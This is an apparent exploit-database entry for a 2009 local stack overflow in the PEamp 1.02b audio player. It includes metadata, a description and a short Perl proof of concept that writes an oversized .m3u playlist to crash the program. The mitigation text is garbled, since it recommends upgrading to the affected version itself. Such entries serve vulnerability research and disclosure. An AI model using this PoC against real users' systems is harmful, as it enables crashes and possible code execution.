header-logo
Suggest Exploit
vendor:
PEamp
by:
milw0rm.com
9,3
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: PEamp
Affected Version From: 1.02b
Affected Version To: 1.02b
Patch Exists: YES
Related CWE: N/A
CPE: a:peamp:peamp:1.02b
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

PEamp 1.02b (.M3U File) Local Stack Overflow POC

A stack overflow vulnerability exists in PEamp 1.02b when a specially crafted .M3U file is loaded. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The application fails to properly validate the length of user-supplied data prior to copying it to a fixed-length buffer on the stack.

Mitigation:

Upgrade to the latest version of PEamp 1.02b or apply the patch from the vendor.
Source

Exploit-DB raw data:

# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #   PEamp 1.02b  (.M3U File) Local Stack Overflow POC                        ##
# #  Download: http://files.brothersoft.com/mp3_audio/players/mp3player.zip    ##
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $chars= "A" x 5000;
my $file="dz.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
# usage: amp.exe=> load playlist => dz.m3u => Boom !!! :)

# milw0rm.com [2009-07-01]